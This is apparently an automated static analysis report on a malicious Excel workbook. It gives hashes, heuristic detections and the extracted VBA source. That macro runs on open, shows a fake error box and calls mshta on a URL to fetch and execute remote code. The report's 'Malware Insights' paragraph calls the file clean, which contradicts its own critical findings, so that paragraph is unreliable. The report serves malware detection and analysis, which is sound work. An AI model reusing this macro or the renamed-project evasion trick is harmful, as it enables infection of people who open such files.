Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 d685747fcfcdf80f…

MALICIOUS

Office (OOXML) / .XLSX

35.5 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-27
MD5: 231cec4f63028cdcdac30caa196d45b0 SHA-1: 40e0a297b92c7ed3451f0e2aec37edb06018bf55 SHA-256: d685747fcfcdf80f50b8611fa8f6d992a0d702330a117cb137d8cce80594e696
230 Risk Score

Malware Insights

Static analysis of the XLSX file revealed no malicious heuristics, scripts, or embedded content. The file metadata indicates it was created by Microsoft Excel and has a clean verdict.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/kokokokook.b)
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Debug.Print (Shell(X + Y + Z))
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    X = "mshta  "
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/ In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 897 bytes
SHA-256: b84e30a0477df22f4383b3ac7808015f4d961b5f78f3d8a9863ff85ccbdd8170
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Debug.Print MsgBox("ERROR!", vbOKCancel); returns; 1
Dim X As String
Dim Y As String
Dim Z As String
X = "mshta  "
Y = "https://www.bitly.com/"
Z = "kddjkkdowkdowkdwwi"
Debug.Print X
Debug.Print Y
Debug.Print Z
Debug.Print (Shell(X + Y + Z))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/kokokokook.b 14848 bytes
SHA-256: efd5fe28ac30904f4e75f53b07be50dc7d53c6b12f266c0717dbff7bf5fc63b9

Open this report in the interactive analyzer, or submit your own file for analysis.